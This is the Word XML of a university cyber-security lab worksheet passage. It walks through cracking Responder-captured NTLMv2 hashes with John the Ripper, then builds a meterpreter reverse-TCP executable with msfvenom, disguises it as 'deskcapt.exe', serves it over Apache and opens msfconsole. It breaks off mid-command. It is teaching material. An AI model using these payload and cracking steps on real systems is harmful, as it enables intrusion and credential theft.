                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="70" name="Lin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662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01685E" id="Line 47" o:spid="_x0000_s1026" style="position:absolute;z-index:1574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4.65pt,765.95pt" to="595.3pt,76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">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Let us use the available tools to crack the hashes </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper 1.9.0-jumbo-1 OMP </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[linux-gnu 64-bit x86_64 AVX2 AC]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E4DCC" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4" w:line="484" w:lineRule="auto"/>
        <w:ind w:left="1559" w:right="3967"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copyright (c) 1996-2019 by Solar Designer and others Homepage: </w:t>
      </w:r>
      <w:hyperlink r:id="rId43">
        <w:r>
          <w:t>http://www.openwall.com/j</w:t>
        </w:r>
        <w:r>
          <w:t>ohn/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="463B658C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB38EE9" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="839"/>
      </w:pPr>
      <w:r>
        <w:t>Open Kali Terminal and execute John the Ripper for the file with Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567E85CB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDF8E0B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="92"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>kali@kali:~$ john /usr/share/responder/logs/SMB-NTLMv2-SSP-10.0.2.7.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715918E8" w14:textId="1565FF99" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="23" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="610A3DF7" wp14:editId="60F80837">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1510030</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>176762</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5030107" cy="3771900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="19" name="image20.jpeg" descr="C:\Users\n.kaliyamurthy\OneDrive - University of Wales Trinity Saint David\Modules_Handling\Sep 2020\L6 - Advanced Cyber Security (ACCB6000)\Images used in PPts\screen12112020\A210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0.jpe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30107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E4E04">
        <w:rPr>
          <w:noProof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26601DDE" wp14:editId="4BA50963">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>895985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4104005</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5768340" cy="2103120"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="69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8340" cy="210312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40EB71" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:ind w:left="28"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Similar to this tool, you could use other existing tools to capture the password in a victim Machine…</w:t>
                            </w:r>
                            <w:r>
                              <w:t>.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2A9525A5" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:spacing w:before="9"/>
                              <w:rPr>
                                <w:sz w:val="23"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="36D1EB61" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:ind w:left="28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</w:rPr>
                              <w:t>Try other methods and record them in your coursework and/or in the shared Onenote with instructions to gain CREDITS</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E3FCA2C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="603BBCF8" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:ind w:left="28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9BBB59"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Examples (So called hints):</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6ECD5EC4" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="57B97BE3" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:ind w:left="28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9BBB59"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Crack Security Account Manager hashes using existing tools like Pwdump7 to extract the hashes and ophcrack tool crack the hashes.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="01D2A8E2" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="09A58B6B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:spacing w:before="1"/>
                              <w:ind w:left="28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9BBB59"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Alternatively, use Winrtgen and RainbowCrack tool to crack password hashes.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601DDE" id="Text Box 46" o:spid="_x0000_s1036" type="#_x0000_t202" style="position:absolute;margin-left:70.55pt;margin-top:323.15pt;width:454.2pt;height:165.6pt;z-index:-15716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" fillcolor="#f2f2f2" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5940EB71" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:ind w:left="28"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Similar to this tool, you could use other existing tools to capture the password in a victim Machine…</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2A9525A5" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:spacing w:before="9"/>
                        <w:rPr>
                          <w:sz w:val="23"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="36D1EB61" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:ind w:left="28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</w:rPr>
                        <w:t>Try other methods and record them in your coursework and/or in the shared Onenote with instructions to gain CREDITS</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E3FCA2C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="603BBCF8" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:ind w:left="28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color w:val="9BBB59"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Examples (So called hints):</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6ECD5EC4" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="57B97BE3" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:ind w:left="28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color w:val="9BBB59"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Crack Security Account Manager hashes using existing tools like Pwdump7 to extract the hashes and ophcrack tool crack the hashes.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="01D2A8E2" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="09A58B6B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:spacing w:before="1"/>
                        <w:ind w:left="28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color w:val="9BBB59"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Alternatively, use Winrtgen and RainbowCrack tool to crack password hashes.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21D5F1E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD6A57D" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:sectPr w:rsidR="008B5358">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349790F8" w14:textId="0E587FE6" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="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42464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5066991A" wp14:editId="60F767DD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="68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662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9B93EF" id="Line 45" o:spid="_x0000_s1026" style="position:absolute;z-index:15742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4.65pt,765.95pt" to="595.3pt,76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">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A13B6F" w14:textId="194C4AC5" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="81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0B0C50EB" wp14:editId="599DE44D">
                <wp:extent cx="5768340" cy="3510280"/>
                <wp:effectExtent l="635" t="3810" r="3175" b="635"/>
                <wp:docPr id="67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8340" cy="351028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AC4FBC" w14:textId="595EFEE1" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:ind w:left="28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Record your reflections on gaining the hashes and cracking them</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C64D3C2" w14:textId="331C8109" w:rsidR="009270A5" w:rsidRDefault="009270A5">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:ind w:left="28"/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678EFBA7" w14:textId="5BE0FAE6" w:rsidR="009270A5" w:rsidRDefault="009270A5">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:ind w:left="28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Gaining the hashes using responder is a very fast way of gaining the hashes for the windows credentials by monitoring the ethernet 0 for the windows logs.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="610642C9" w14:textId="3C5C8D42" w:rsidR="009270A5" w:rsidRDefault="009270A5">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:ind w:left="28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Cracking the hashes with john the ripper didn’t take that long.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B0C50EB" id="Text Box 44" o:spid="_x0000_s1037" type="#_x0000_t202" style="width:454.2pt;height:276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" fillcolor="#f2f2f2" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3AAC4FBC" w14:textId="595EFEE1" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:ind w:left="28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Record your reflections on gaining the hashes and cracking them</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C64D3C2" w14:textId="331C8109" w:rsidR="009270A5" w:rsidRDefault="009270A5">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="678EFBA7" w14:textId="5BE0FAE6" w:rsidR="009270A5" w:rsidRDefault="009270A5">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:ind w:left="28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Gaining the hashes using responder is a very fast way of gaining the hashes for the windows credentials by monitoring the ethernet 0 for the windows logs.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="610642C9" w14:textId="3C5C8D42" w:rsidR="009270A5" w:rsidRDefault="009270A5">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:ind w:left="28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Cracking the hashes with john the ripper didn’t take that long.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571D3CA" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="008B5358">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD6A447" w14:textId="3E1732EF" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:spacing w:before="82"/>
        <w:ind w:left="840" w:right="1444"/>
        <w:rPr>
          <w:b/>
          <w:sz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43488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09D3021D" wp14:editId="490774C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="66" name="Lin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662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89133E" id="Line 43" o:spid="_x0000_s1026" style="position:absolute;z-index:1574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4.65pt,765.95pt" to="595.3pt,76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">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>From our previous lab, (redo the same tasks) using Metasploit and MSVENOM to gain access to remote desktop co</w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nnection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176924F7" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="117"/>
        <w:ind w:left="840" w:right="1444"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(As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this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lab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is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already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completed,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description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is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very</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>short.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If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>you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need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clarification, please refer to our previous lab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work)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BBE43C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="123"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 2: Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>MSFVENOM to create Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2F96BB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B661F8" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="92"/>
        <w:ind w:right="2446"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp –platform</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>windows –a x86 lhost=10.0.2.15 lport=3333 -f exe -o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D93F5B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:after="2"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>/home/kali/Desktop/deskcapt.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E608536" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F04CFE6" wp14:editId="76A8A1B0">
            <wp:extent cx="4419784" cy="3314700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="image21.jpeg" descr="C:\Users\n.kaliyamurthy\OneDrive - University of Wales Trinity Saint David\Modules_Handling\Sep 2020\L6 - Advanced Cyber Security (ACCB6000)\Images used in PPts\screen12112020\A310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21.jpe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19784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E34BD2" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="28" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E4FD5F2" wp14:editId="17CF8C3E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1371600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>213359</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4420267" cy="3314700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="23" name="image22.jpeg" descr="C:\Users\n.kaliyamurthy\OneDrive - University of Wales Trinity Saint David\Modules_Handling\Sep 2020\L6 - Advanced Cyber Security (ACCB6000)\Images used in PPts\screen12112020\A410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2.jpe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20267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5E0A403" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:sectPr w:rsidR="008B5358">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6600D011" w14:textId="3349B8F8" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23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45024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1043EC82" wp14:editId="72F16F5A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="65" name="Lin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662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FE77A5" id="Line 42" o:spid="_x0000_s1026" style="position:absolute;z-index:1574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4.65pt,765.95pt" to="595.3pt,76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">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="483B193B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="92"/>
        <w:ind w:left="840" w:right="5020"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>kali@kali:~$ sudo mkdir /var/www/html/share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>kali@kali:~$ chmod -R 777 /var/www/html/share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E43CC58" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:ind w:left="840" w:right="2485"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>kali@kali:~$ chown -R www-data:www-data /var/www/html/share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>kali@kali:~$ cp /home/kali/Desktop/deskcapt.exe /var/www/html/share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>kali@kali:~$ service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0312A1" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>kali@kali:~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE68FA" w14:textId="17DC048C" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840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18D503BB" wp14:editId="22D9C80B">
                <wp:extent cx="43180" cy="175260"/>
                <wp:effectExtent l="0" t="0" r="4445" b="0"/>
                <wp:docPr id="63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180" cy="175260"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="68" cy="276"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="64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8" cy="276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26C024E" id="Group 40" o:spid="_x0000_s1026" style="width:3.4pt;height:13.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="68,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">
                <v:rect id="Rectangle 41" o:spid="_x0000_s1027" style="position:absolute;width:68;height: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" fillcolor="yellow" stroked="f"/>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E2B65" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 &gt; use</w:t>
